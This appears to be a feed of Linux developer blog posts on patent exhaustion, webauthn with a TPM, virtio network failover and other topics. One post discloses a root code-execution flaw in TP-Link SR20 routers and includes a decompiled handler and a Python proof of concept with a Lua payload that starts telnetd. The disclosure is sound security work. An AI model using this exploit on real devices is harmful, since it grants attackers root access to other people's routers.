The next question to address is could patents become exhausted simply because the holder distributed Open Source code in any form? As I said before, there is actually a case on point for this as well: Cascades v Samsung. In this case, Cascades tried to sue Samsung for violating a patent on the Dalvik JIT engine in AOSP. Cascades claimed they had licensed the patent to Google for a payment only for use in Google products. Samsung claimed exhaustion because Cascades had licensed the patent to Google and Samsung downloaded AOSP from Google. The court agreed with this and dismissed the infringement action. Case closed, right? Not so fast: it turns out Cascades raised a rather silly defence to Samsung’s claim of exhaustion, namely that the authorized transfer under the exhaustion doctrine didn’t happen until Samsung did the download from Google, so they were still entitled to enforce the Google products only restriction. As I said in the beginning courts have centuries of history with manufacturers trying to get around the exhaustion doctrine and this one crashed and burned just like all the others. However, the question remains: if Cascades had raised a better defence to the exhaustion claim, would they have prevailed?

The defence Cascades could have raised is that Samsung didn’t just download code from Google, they also copied the code they downloaded and those copies should be covered under the patent right to exclude manufacture, which didn’t exhaust with the download. To illustrate this in the Alice, Bob, Charlie chain: Alice sells an item to Bob and thus exhausts the patent so Bob can sell it on to Charlie unencumbered. However that exhaustion does not give either Bob or Charlie the right to manufacture a new copy of the item and sell it to Denise because exhaustion only applies to the same item Alice sold, not to a newly manufactured copy of that item.

The copy as new manufacture defence still seems rather vulnerable on two grounds: first because Samsung could download any number of exhausted copies from Google, so what’s the difference between them downloading ten copies and them downloading one copy and then copying it themselves nine times. Secondly, and more importantly, Cascades already had a remedy in copyright law: their patent licence to Google could have required that the AOSP copyright licence be amended not to allow copying of the source code by non-Google entities except on payment of royalties to Cascades. The fact that Cascades did not avail themselves of this remedy at the time means they’re barred from reclaiming it now via patent action.

The bottom line is that distribution exhausts all patents reading on the code you distribute is a very reasonable defence to maintain in a patent infringement lawsuit and it’s one we should be using much more often.

Exhaustion by Contribution

This is much more controversial and currently has no supporting case law. The idea is that Distribution can occur even with only incremental updates on the existing base (git pull to update code, say), so if delta updates constitute an authorized transfer under the exhaustion doctrine, then so must a patch based contribution, being a delta update from a contributor to the project, be an authorized transfer. In which case all patents which read on the project at the time of contribution must also exhaust when the contribution is made.

Even if the above doesn’t fly, it’s undeniable most contributions today are made by cloning a git tree and republishing it plus your own updates (essentially a github fork) which makes you a bona fide distributor of the whole project because it can all be downloaded from your cloned tree. Thus I think it’s reasonable to hold that all patents owned by distributors and contributors in an open source project have exhausted in that project. In other words all the arguments about the scope and extent of patent grants and patent capture in open source licences is entirely unnecessary.

Therefore, all active participants in an Open Source community ipso facto exhaust any patents on the community code as that code is redistributed.

Implications for Proprietary Software

Firstly, it’s important to note that the exhaustion arguments above have no impact on the patentability of software or the validity of software patents in general, just on their enforcement. Secondly, exhaustion is triggered by the unencumbered right to redistribute which is present in all Open Source licences. However, proprietary software doesn’t come with a right to redistribute in the copyright licence, meaning exhaustion likely doesn’t trigger for them. Thus the exhaustion arguments above have no real impact on the ability to enforce software patents in proprietary code except that one possible defence that could be raised is that the code practising the patent in the proprietary software was, in fact, legitimately obtained from an open source project under a permissive licence and thus the patent has exhausted. The solution, obviously, is that if you worry about enforceability of patents in proprietary software, always use a copyleft licence for your open source.

What about the Patent Troll Problem?

Trolls, by their nature, are not IP producing entities, thus they are not ecosystem participants. Therefore trolls, being outside the community, can pursue infringement cases unburdened by exhaustion problems. In theory, this is partially true but Trolls don’t produce anything, therefore they have to acquire their patents from someone who does. That means that if the producer from whom the troll acquired the patent was active in the community, the patent has still likely exhausted. Since the life of a patent is roughly 20 years and mass adoption of open source throughout the software industry is only really 10 years old1 there still may exist patents owned by Trolls that came from corporations before they began to be Open Source players and thus might not be exhausted.

The hope this offers for the Troll problem is that in 10 years time, all these unexhausted patents will have expired and thanks to the onward and upward adoption of open source there really will be no place for Trolls to acquire unexhausted patents to use against the software industry, so the Troll threat is time limited.

A Call to Arms: Realising the Elimination of Patents in Open Source

Your mission, should you choose to be part of this project, is to help advance the legal doctrines on patent exhaustion. In particular, if the company you work for is sued for patent infringement in any Open Source project, even by a troll, suggest they look into asserting an exhaustion based defence. Even if your company isn’t currently under threat of litigation, simply raising awareness of the option of exhaustion can help enormously.

The first case an exhaustion defence could potentially be tried is this one: Sequoia Technology is asserting a patent against LVM in the Linux kernel. However it turns out that patent 6,718,436 is actually assigned to ETRI, who merely licensed it to Sequoia for the purposes of litigation. ETRI, by the way, is a Linux Foundation member but, more importantly, in 2007 ETRI launched their own distribution of Linux called Booyo which would appear to be evidence that their own actions as a distributor of the Linux Kernel have exhaused patent 6,718,436 in Linux long before they ever licensed it to Sequoia.

If we get this right, in 10 years the Patent threat in Open Source could be history, which would be a nice little legacy to leave our children.

March 30, 2019 09:32 PM

March 29, 2019

Pete Zaitcev: Swift(stack) bragging today

On their official blog:

Over the last several months, SwiftStack has been busy helping two large autonomous vehicle customers. These data pipelines are distributed across edge (vehicle sensors) to core (data center) to cloud/multi-cloud locations, and are challenged with ingest, labeling, training, inferencing, and retaining data at scale. [...] one deployment is handling more than a petabyte of data per week, with four thousand GPU cores from NVIDIA DGX-1 servers fed with 100 GB/s of throughput from SwiftStack cluster.

I suspect the task-queue expirer could be helpful at this. Although, if you're uploading 1 PB per week, it takes about a year to fill out a cluster as big as Turkcell's.

Apparently the actual storage is provided by Cisco UCS S3260. Some of our customers use Cisco UCS to run Swift too. I always thought about Cisco as a networking company, but it's different nowadays.

March 29, 2019 03:54 AM

Daniel Vetter: X.org Elections: freedesktop.org Merger - Vote Now!

Aside from the regular board elections we also have some bylaw changes to vote on. As usual with bylaw changes, we need a supermajority of all members to agree - if you don’t vote you essentially reject it, but the board has no way of knowing.

Please see the detailed changes of the bylaws, make up your mind, and go voting on the shiny new members page.

March 29, 2019 12:00 AM

March 28, 2019

Matthew Garrett: Remote code execution as root from the local network on TP-Link SR20 routers

The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign - popen() passes its argument directly to the shell, so if there's any way to get user controlled input into a popen() call you're basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here's a cut down decompilation of the function:

int ftest_config(char *byte) {
  int lua_State;
  char *remote_address;
  int err;
  int luaerr;
  char filename[64]
  char configFile[64];
  char luaFile[64];
  int attempts;
  char *payload;

  attempts = 4;
  memset(luaFile,0,0x40);
  memset(configFile,0,0x40);
  memset(filename,0,0x40);
  lua_State = luaL_newstart();
  payload = iParm1 + 0xb027;
  if (payload != 0x00) {
    sscanf(payload,"%[^;];%s",luaFile,configFile);
    if ((luaFile[0] == 0) || (configFile[0] == 0)) {
      printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b);
    }
    else {
      remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4));
      tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address);
      sprintf(filename,"/tmp/%s",luaFile);
      while (0 < attempts) {
        sleep(1);
        err = access(filename,0);
        if (err == 0) break;
        attempts = attempts + -1;
      }
      if (attempts == 0) {
        printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename);
      }
      else {
        if (lua_State != 0) {
          luaL_openlibs(lua_State);
          luaerr = luaL_loadfile(lua_State,filename);
          if (luaerr == 0) {
            luaerr = lua_pcall(lua_State,0,0xffffffff,0);
          }
          lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr);
          lua_pushstring(lua_State,configFile);
          lua_pushstring(lua_State,remote_address);
          lua_call(lua_State,2,1);
        }
        lua_close(lua_State);
      }
    }
  }
}
Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address) which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else's attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There's a couple of morals here:

Proof of concept:
#!/usr/bin/python3

# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
 
# Create a file in your tftp directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Execute script as poc.py remoteaddr filename
 
import binascii
import socket
 
port_send = 1040
port_receive = 61000
 
tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00
 
tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])
 
sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))
 
# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
argument = "%s;arbitrary" % sys.argv[2]
packet = packet + argument.encode()
sock_send.sendto(packet, (sys.argv[1], port_send))
sock_send.close()
 
response, addr = sock_receive.recvfrom(1024)
r = response.encode('hex')
print(r)

[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch

comment count unavailable comments

March 28, 2019 10:18 PM

March 23, 2019

James Bottomley: Webauthn in Linux with a TPM via the HID gadget

Account security on the modern web is a bit of a nightmare. Everyone understands the need for strong passwords which are different for each account, but managing them is problematic because the human mind just can’t remember hundreds of complete gibberish words so everyone uses a password manager (which, lets admit it, for a lot of people is to write it down). A solution to this problem has long been something called two factor authentication (2FA) which authenticates you by something you know (like a password) and something you posses (like a TPM or a USB token). The problem has always been that you ideally need a different 2FA for each website, so that a compromise of one website doesn’t lead to the compromise of all your accounts.

Enter webauthn. This is designed as a 2FA protocol that uses public key cryptography instead of shared secrets and also uses a different public/private key pair for each website. Thus aspiring to be a passwordless secure scalable 2FA system for the web. However, the webauthn standard only specifies how the protocol works when the browser communicates with the remote website, there’s a different standard called FIDO or U2F that specifies how the browser communicates with the second factor (called an authenticator in FIDO speak) and how that second factor works.

It turns out that the FIDO standards do specify a TPM as one possible backend, so what, you might ask does this have to do with the Linux Gadget subsystem? The answer, it turns out, is that although the standards do recommend a TPM as the second factor, they don’t specify how to connect to one. The only connection protocols in the Client To Authenticator Protocol (CTAP) specifications are USB, BLE and NFC. And, in fact, the only one that’s really widely implemented in browsers is USB, so if you want to connect your laptop’s TPM to a browser it’s going to have to go over USB meaning you need a Linux USB gadget. Conspiracy theorists will obviously notice that if the main current connector is USB and FIDO requires new USB tokens because it’s a new standard then webauthn is a boon to token manufacturers.

How does Webauthn Work?

The protocol comes in two flavours, version 1 and version 2. Version 1 is fixed cryptography and version 2 is agile cryptography. However, version1 is simpler so that’s the one I’ll explain.

Webauthn essentially consists of two phases: a registration phase where the authenticator is tied to the account, which often happens when the remote account is created, and authentication where the authenticator is used to log in again to the website after registration. Obviously accounts often outlive the second factor, especially if it’s tied to a machine like the TPM, so the standard contemplates a single account having multiple registered authenticators.

The registration request consists of a random challenge supplied by the remote website to prevent replay and an application id which is constructed by the browser from the website supplied ID and the web origin of the site. The design is that the application ID should be unique for each remote account and not subject to being faked by the remote site to trick you into giving up some other application’s credentials.

The authenticator’s response consists of a unique public key, an opaque key handle, an attestation X.509 certificate containing a public key and a signature over the challenge, the application ID, the public key and the key handle using the private key of the certificate. The remote website can verify this signature against the certificate to verify registration. Additionally, Google recommends that the website also verifies the attestation certificate against a list of know device master certificates to prove it is talking to a genuine U2F authenticator. Since no-one is currently maintaining a database of “genuine” second factor master certificates, this last step mostly isn’t done today.

In version 1, the only key scheme allowed is Elliptic Curve over the NIST P-256 curve. This means that the public key is always 65 bytes long and an encrypted (or wrapped) form of the private key can be stashed inside the opaque key handle, which may be a maximum of 255 bytes. Since the key handle must be presented for each authentication attempt, it relieves the second factor from having to remember an ever increasing list of public/private key pairs because all it needs to do is unwrap the private key from the opaque handle and perform the signature and then forget the unwrapped private key. Note that this means per user account authenticator, the remote website must store the public key and the key handle, meaning about 300 bytes extra, but that’s peanuts compared to the amount of information remote websites usually store per registered account.

To perform an authentication the remote website presents a unique challenge, the raw ID from which the browser should construct the same application ID and the key handle. Ideally the authenticator should verify that the application ID matches the one used for registration (so it should be part of the wrapped key handle) and then perform a signature over the application ID, the challenge and a unique monotonically increasing counter number which is sent back in the response. To validly authenticate, the remote website verifies the signature is genuine and that the count has increased from the last time authentication has done (so it has to store the per authenticator 4 byte count as well). Any increase is fine, so each second factor only needs to maintain a single monotonically increasing counter to use for every registered site.

Problems with Webauthn and the TPM

The primary problem is the attestation certificate, which is actually an issue for the whole protocol. TPMs are actually designed to do attestation correctly, which means providing proof of being a genuine TPM without compromising the user’s privacy. The way they do this is via a somewhat complex attestation protocol involving a privacy CA. The problem they’re seeking to avoid is that if you present the same certificate every time you use the device for registration you can be tracked via that certificate and your privacy is compromised. The way the TPM gets around this is that you can use a privacy CA to produce an arbitrary number of different certificates for the same TPM and you could present a new one every time, thus leaving nothing to be tracked by.

The ability to track users by certificate has been a criticism levelled at FIDO and the best the alliance can come up with is the idea that perhaps you batch the attestation certificates, so the same certificate is used in hundreds of new keys.

The problem for TPMs though is that until FIDO devices use proper privacy CA based attestation, the best you can do is generate a separate self signed attestation certificate. The reason is that the TPM does contain its own certificate, but it’s encryption only, not signing because of the way the TPM privacy CA based attestation works. Thus, even if you were willing to give up your privacy you can’t use the TPM EK certificate as the FIDO attestation certificate. Plus, if Google carries out its threat to verify attestation certificates, this scheme is no longer going to work.

Aside about Browsers and CTAP

The crypto aware among you will recognise that there is already a library based standard that can be used to talk to a variety of USB tokens and even the TPM called PKCS#11. Mozilla Firefox, for instance, already supports using this as I demonstrated in a previous blog post. One might think, based on what I said about the one token per key problem in the introduction, that PKCS#11 can’t support the new key wrapping based aspect of FIDO but, in fact, it can via the C_WrapKey/C_UnwrapKey API. The only thing PKCS#11 can’t do is the new monotonic counter.

Even if PKCS#11 can’t perform all the necessary functions, what about a new or extended library based protocol? This is a good question to which I’ve been unable to get a satisfactory answer. Certainly doing CTAP correctly requires that your browser be able to speak directly to the USB, Bluetooth and NFC subsystems. Perhaps not too hard for a single platform browser like Internet Explorer, but fraught with platform complexity for generic browsers like FireFox where the only solution is to have a rust based accessor for every supported platform.

Certainly the lack of a library interface are where the TPM issues come from, because without that we have to plug the TPM based FIDO layer into a browser over an existing CTAP protocol it supports, i.e. USB. Fortunately Linux has the USB Gadget subsystem which fits the bill precisely.

Building Synthetic HID Devices with USB Gadget

Before you try this at home, I should point out that the Linux HID Gadget has a longstanding bug that will cause your machine to hang unless you have this patch applied. You have been warned!

The HID subsystem is for driving Human Interaction Devices meaning keyboard and mice. However, it has a simple packet (called report in USB speak) based protocol which is easy for most things to use. In order to facilitate this, Linux actually provides hidraw devices which allow you to send and receive these reports using read and write system calls (which, in fact, is how Firefox on Linux speaks CTAP). What the hid gadget does when set up is provide all the static emulation of HID device protocols (like discovery pages) while allowing you to send and receive the hidraw packets over the /dev/hidgX device tap, also via read and write (essentially operating like a tty/pty pair1). To get the whole thing running, the final piece of the puzzle is that the browser (most likely running as you) needs to be able to speak to the hidraw device, so you need a udev rule to make it accessible because by default they’re 0600. Since the same goes for every other USB security token, you’ll find the template in the same rpm that installs the PKCS#11 library for the token.

The way CTAP works is that every transaction is split into 64 byte reports and sent over the hidraw interface. All you need to do to get this setup is initialise a report descriptor for this type of device. Since it’s somewhat cumbersome to do, I’ve created this script to do it (run it as root). Once you have this, the hidraw and hidg devices will appear (make them both user accessible with chmod 666) and then all you need is a programme to drive the hidg device and you’re done.

A TPM Based Hid Gadget Driver

Note: this section is written describing TPM 2.0.

The first thing we need out of the TPM is a monotonic counter, but all TPMs have NV counter indexes which can be created (all TPM counters are 8 byte, whereas the CTAP protocol requires 4 bytes, but we simply chop off the top 4 bytes). By convention I create the counter at NV index 01000101. Once created, this counter will be persistent and monotonic for the lifetime of the TPM.

The next thing you need is an attestation certificate and key. These must be NIST P-256 based, but it’s easy to get openssl to create them

openssl genpkey -algorithm EC -pkeyopt ec_paramgen_curve:prime256v1 -pkeyopt ec_param_enc:named_curve -out reg_key.key

openssl req -new -x509 -subj '/CN=My Fido Token/' -key reg_key.key -out reg_key.der -outform DER

This creates a self signed certificate, but you could also create a certificate chain this way.

Finally, we need the TPM to generate one NIST P-256 key pair per registration. Here we use the TPM2_Create() call which gets the TPM to create a random asymmetric key pair and return the public and wrapped private pieces. We can simply bundle these up and return them as the key handle (fortunately, what the TPM spits back for a NIST P-256 key is about 190 bytes when properly marshalled). When the remote end requests an authentication, we extract the TPM key from the key handle and use a TPM2_Load to place it in the TPM and sign the hash and then unload it from the TPM. Putting this all together this project (which is highly experimental) provides the script to create the devices and a hidg driver that interfaces to the TPM. All you need to do is run it as

hidgd /dev/hidg0 reg_key.der reg_key.key

And you’re good to go. If you want to test it there are plenty of public domain webauthn test sites, webauthn.org and webauthn.io2 are two I’ve tested as working.

TODO Items

The webauthn standard specifies the USB authenticator should ask for permission before performing either registration or authentication. Currently the TPM hid gadget doesn’t have any external verification, but in future I’ll add a configurable pinentry to add confirmation and possibly also a single password for verification.

The current code also does nothing to verify the application ID on a per authorization basis. This is a security problem because you are currently vulnerable to being spoofed by malicious websites who could hand you a snooped key handle and then use the signature to fake your login to a different site. To avoid this, I’m planning to use the policy area of the TPM key to hold the application ID. This should work because the generated keys have no authorization, either policy or password, so the policy area is effectively redundant. It is in the unwrapped public key, but if any part of the public key is tampered with the TPM will detect this via a hash in the wrapped private error and give a binding error on load.

The current code really only does version 1 of the FIDO protocol. Ideally it needs upgrading to version 2. However, there’s not really much point because for all the crypto agility, most TPMs on the market today can only do NIST P-256 curves, so you wouldn’t gain that much.

Conclusions

Using this scheme you’re ready to play with FIDO/U2F as long as you have a laptop with a functional TPM 2.0 and a working USB gadget subsystem. If you want to play, please remember to make sure you have the gadget patch applied.

March 23, 2019 09:58 PM

March 17, 2019

Michael S. Tsirkin:

Virtio Network Device Failover


Support for Virtio Network Device Failover which has been merged for linux 4.17 presents an interesting study in interface design: both for operating systems and hypervisors. Read on for an article examining the problem domain, solution space and describing the current status of the implementation.


PT versus PV NIC

Imagine a Virtual Machine running on a hypervisor on a host computer. The hypervisor has access to a network to which the host is attached, but ow should guest gain this access? The answer could depend on the type of the netwok and on the network interface on the host. For the sake of this article we focus on Ethernet networks and NICs. In this setup a popular solution extends (bridges) the Ethernet network into the guest by exposing a virtual Ethernet device as part of the VM.

In most setups a single host NIC would be shared between VMs. Two popular configurations are shows below:

vm network configuration

In the first diagram (on the left) the NIC exposes Virtual Function (VFs) interfaces which the hypervisor “passes through” - makes accessible to the guests. Using such Passthrough (PT) interfaces packets can pass between the guest and the NIC directly. For PCI devices, device memory can actually be mapped into the address space of the virtual machine in such as way that guest can actually access the device without invoking the hypervisor. In the setup on the right packets are passed between the guest and the NIC by the hypervisor. The hypervisor interface used by guest for this purpose would commonly be a PV - Para-virtual (i.e. designed for the hypervisor) NIC. One example would be the Virtio network device, used for example with the KVM hypervisor. By comparison, Microsoft HyperV guests use the netvsc device with its PV NICs.

Since the underlying packets are still handled by the physical NIC in both cases, it would be unusual for the second (PV) setup to outperform the first (PT) one. Besides removing some of the hypervisor overhead, passthrough allows driver within the guest to be precisely tuned to the physical device.

However the PV NIC setup obviously offers more flexibility - for example, the hypervisor can implement an arbitrary filtering policy for the networking packets. By comparison, with PT NICs we are limited to the features presented by hardware NICs which are often more limited: some of them only have simplest filtering capabilities. As an example of a simple and effective filtering/security measure, guest would often be prevented from modifying the MAC address of its devices, limiting guest’s access to the host’s network.

But even besides limitations of specific hardware the standardized interface independent of the physical NIC makes the system easier to manage: use of a standard driver within guest as well as a well known state of the device enable features such as live migration of guests between hypervisors: guests can often be moved with negligible network downtime.

Same can not be generally said with the passthrough setup, for example, one of the issues encountered with it is that even a small difference between hypervisor hosts in their physical hardware would require expensive reconfiguration when switching hypervisors.

Can not something be done with respect to performance to get the speed benefits of pass-through without giving up on live migration and similar advantages of standardized PV NIC setups? One approach could be designing a pass-through NIC around a standard paravirtualized interface. This is the approach taken by the Virtio Data Path Accelerator devices. In absence of such an accelerator, Virtual Network Device Failover presents another possible approach.

Network device Failover basics

Conceptually, the idea behind Virtual Network Device Failover is simple: assume that a standard PV interface only brings benefits part of the time. The system would change its configuration accordingly - e.g. when migration is required use the PV interface, when it’s not - use a PT device.

When possible hypervisor will pass through the NIC to the guest as a “primary” device. To reduce downtime, a “standby” PV device could be kept around at all times. When PV features are not required, hypervisor can add guest access to the primary PT device. At other times the standby PV interface is used.

Accordingly, guest would be required to switch over between primary and standby interfaces depending on availability of the primary interface.

network device failover basics

An astute reader might notice that the above switching sounds a bit like the active-backup configuration of the bond and team network drivers in Linux. That is true - in fact in the past one of these drivers has often been used to implement network device failover. Let’s take a quick look at how active-backup can be used for network device failover.

Network Device Failover using active-backup

This text will use the term bond when meaning the network device created by either a bond or the team driver: the differences between these two mostly have to do with how devices are created, configured and destroyed and will not be covered here.

A bond device is a master software network device which can enslave multiple interfaces. In our case these would be the standby and the primary devices. For this, the bond master needs to be created and initialized with slave interface names before slaves are brought up. When priority of the primary interface is set higher than priority of the standby, the bond will switch between interfaces as required for failover.

The active-backup was designed to help create redundancy and improve uptime for systems with multiple NIC devices. To make it work for the virtual machine, we need guest to detect interface failure on the primary interface and switch to the stanby one. This can be achieved for example by removing the interface by making the hypervisor emulate hotplug removal request.

However the above might already hint at some of the issues with this approach to failover: first, bond needs to be set up by userspace. Configuring a bond for all devices unconditionally would be an option but would add overhead to all users. On the other hand, adding a slave to the bond would require bringing the slave down. For this reason to avoid downtime bond has to be created upfront, even if only the standby device is present during guest initialization.

Further, setting up an active-backup bond is considered a question of policy and thus is left up to guest admin. By comparison network failover is a mechanism - there’s no good reason not to use a PT interface if it is available to the guest. Should hypervisor want to force guest to create a bond, hypervisor would need a measure of control over guest network configuration which might conflict with the way some guest admins like to set up their networking.

Another issue is with device selection. Bond tends to address devices using their names. While recently device names under many Linux distributions became more predictable, it is not the case for all distributions, and specific naming schemes might differ. It is thus a challenge for the hypervisor to specify to the guest which interfaces need to be bonded together.

To help reduce downtime, the bond will also broadcast location information on a network on every switch. This is not too problematic but might cause extra load on the network - likely unnecessary in case of virtual device failover since packets are in the end traveling over the same physical wire.

Maintaining a consistent MAC address for the guest is necessary to avoid need for all guest neighbours to rediscover the MAC address using the slow APR/Neighbour Discovery. To help with that, bond will try to program the MAC address into the primary device when it’s attached. If MAC programming is disabled as a security measure (as described above) bond will generally fail to attach to this slave.

Failover goals; 1,2 and 3 device models

The goal of the network device failover support in Linux is to address the above problems. Specifically: - PT cards with MAC programming disabled need to be supported - configuration should happen automatically, with no need for userspace to make a policy decision - in particular the primary/standby pair of devices should be selected with no need for special configuration to be passed from hypervisor - support as wide a range of existing network setup tools as possible with minimal changes

Most of the design seems to fall out from the above goals in a manner that is more or less straight-forward: - design supports two devices: a standby PV device is present at all times and used by default; a primary PT device is used by preference when it’s available - failover support is initialized by the PV device driver, e.g. in the case of Virtio this happens when the Virtio-net driver detects a special feature bit set by the hypervisor on the Virtio PV device - to support devices without MAC programming, both standby and primary can be simply required to be initialized (e.g. by the hypervisor) with the same MAC address - in that case, MAC address can also used by failover to locate and enslave the primary device

However, the requirement to minimize userspace changes caused a certain amount of debate about the best way to model the failover setup, with the debate centered around the number of network device structures being created and exposed to userspace. It seems worthwhile to list the options that have been debated, below:

1-device model

In a 1-device model userspace sees a single failover device at all times. At any time this device would be either the PT or the PV device. As userspace might need to configure devices differently depending on the specific driver used, a new interface would have to be introduced for kernel to report driver changes to userspace, and for userspace to detect the actual driver used. However, as long as userspace does not contain any driver-specific code, userspace tools that already work with the Virtio device seem to be guaranteed to keep working without any changes, but with a better performance.

To best of author’s knowledge, no actual code supporting this mode has ever been posted.

2-device model

In a 2-device model, the standby and primary devices are exposed to userspace as two network devices. The devices aren’t independent: primary device is a slave and standby is the master in that when primary is present, standby device forwards outgoing packets for transmission on the primary device.

PT driver discovery and device specific configuration can happen on the slave interface using standard device discovery interfaces.

Both portable configuration affecting both PV and PT devices (such as interface MTU) and the configuration that is specific to the PV device will happen on the master interface.

The 2-device model is used by the netvsc driver in Linux. It has been used in production for a number of years with no significant issues reported. However, it diverges from the model used by the bond driver, and the combination of PV-specific and portable configuration on the master device was seen by some developers as confusing.

3-device model

The 3-device model basically follows bond: a master failoverdevice forwards packets to either the primary or the standbyslaves, depending on the primary’s availability.

Failover device maintains portable configuration, primary and standby can each have its own driver-specific configuration.

This model is used by the net_failover driverwhich has been present in Linux since version 4.17. This model isn’t transparent to userspace: for example, presence of at least two devices (failover master and primary slave) at all times seems to confuse some userspace tools such as dracut, udev, initramfs-tools, cloud-init. Most of these tools have since been updated to check the slave flag of each interface and ignore interfaces where it is set.

3-device model with hidden slaves

It is possible that the compatibility of the 3-device model with existing userspace can be improved by somehow hiding the slave devices from most legacy userspace tools, unless they explicitly ask for them.

For example it could be possible to somehow move them to some kind of special network namespace. No patches to implement this idea have been posted so far.

Hypervisor failover support

At the time of this article writing, support for virtual network device failover in the QEMU/KVM hypervisor is still being worked upon. This work uncovered a surprising number of subtle issues some of which will be covered below.

Primary device availability

Network Failover driver relies on hotplug events for the primary device availability. In other words, to make the primary device available to the guest the hypervisor emulates a hot-add hotplug event on a bus within VM (e.g. the virtual PCI bus). To make the primary device unavailable, a hot-unplug event is emulated.

Note that at the moment most PCI drivers expect a chance to be notified and execute cleanup before a device is removed. From hypervisor’s point of view, this would mean that it can not remove the PT device and e.g. can not initiate migration until it receives a response from the VM guest. Making hypervisor depend on guest being responsive in this way is problematic e.g. from the security point of view.

As described earlier in a lwn.net article most drivers do not at the moment support surprise removal well. When that is addressed, hypervisors will be able to switch to emulate surprise removal to remove dependency on guest responsiveness.

Existing Guest compatibility

One of the issues that hypervisors take pains to handle well is compatibility with existing guests, that is guests which have not been modified with virtual network device failover support.

One possible issue is that existing guests can become confused if they detect two Ethernet devices with the same MAC address.

To help address this issue, the hypervisor can defer making the primary device visible to the guest until after the PV driver has been initialized. The PV driver can signal to the hypervisor guest support for the virtual network device failover.

For example, in case of the virtio-net driver, hypervisor can signal the support for failover to guest by setting the VIRTIO_NET_F_STANDBYhost feature bit on the Virtio device. If failover is enabled, the driver can signal failover support to hypervisor by setting the matching VIRTIO_NET_F_STANDBY guest feature bit on the device.

After detecting a modern guest with failover support, the hypervisor can hot-add the primary device. Device will have to be hot-removed again on guest reset - in case the VM will reboot into a legacy guest without failover support.

This is also helpful to avoid initializing a useless failover device on hypervisors without actual failover support.

As of the time of writing of this article, the definition of the VIRTIO_NET_F_STANDBY and its support are present in Linux. Some preliminary hypervisor patches with known issues have been posted.

Packet filtering issues

Early implementations of the failover in QEMU were originally tested with an emulated NIC. When tested on a physical one, it was quickly detected that for many configurations significant downtime occurs.

The reason has to do with how incoming packets are processed by the host NIC. Generally, a packet is matched against some rules (e.g. the destination MAC is matched using a forwarding filter) and a decision is made to forward the packet either to the hypervisor or to a guest through a VF.

incoming packet filtered

Consider again a hypervisor transitioning between configurations where a primary passthrough VF is available to a configuration where it is unavailable to the guest.

When the primary device is available to the guest we want incoming packets with destination MAC matching the device to be forwarded through the primary. In many configurations this happens immediately when the hypervisor programs the MAC into the VF. In these setups, when primary device becomes unavailable to guest, unless special steps are taken, incoming packets will still be filtered to it and eventually dropped.

incoming packet being dropped by device

One possible fix is have the hypervisor update the host NIC filtering, e.g., by updating the MAC of the VF to a different value. Another is to change the filtering on the host NIC such that it only happens when a driver is attached to the VF. This seems to already be the case for some drivers (such as ice,mlx) and so one can argue that others should be changed to behave consistently. Another approach would be to teach hypervisor to detect the difference and handle both types of behaviour.

Conversely, when the primary interface becomes available to guest, we would like packets to start flowing through the primary but only after the driver is bound to it. Again, on some devices hypervisor might need to intervene to update the forwarding filter on the host NIC. One issue is that it might take guests a while to detect a hot-add event and bind a driver to the primary device. This is because hotplug is not generally considered a data path operation. Should the host NIC filter be updated by the hypervisor immediately on hot-add, there will be a large window during which guest driver has not been initialized yet.

incoming packet being dropped by driver

As a possible fix, hypervisors can detect that the pass-through driver has been attached to device. For example, drivers enable bus-mastering on the device when they start using it, and disable it when they stop using it. Hypervisor can detect this event and update the forwarding filter on the host NIC accordingly.

QEMU patches addressing both issues have been posted on the QEMU mailing list.

An alternative could be to add a way for guest to request the switch between primary and standby through the PV device driver. This might reduce the downtime slightly: some PT drivers might enable bus mastering before they are fully ready to receive packets, causing a small window during which packets are still dropped.

This alternative approach is used by the netvsc driver. Using that with net_failover would require extending the Virtio interface and adding support to the net_failover driver in Linux, as of today no patches implementing this change have been posted.

As described above, some differences in behaviour between host NICs make failover implementation harder. While not yet widely supported, use of VF representors could make it easier to consistently configure host NICs for use by failover. However, for it to be helpful to userspace wide support across many NICs would be necessary.

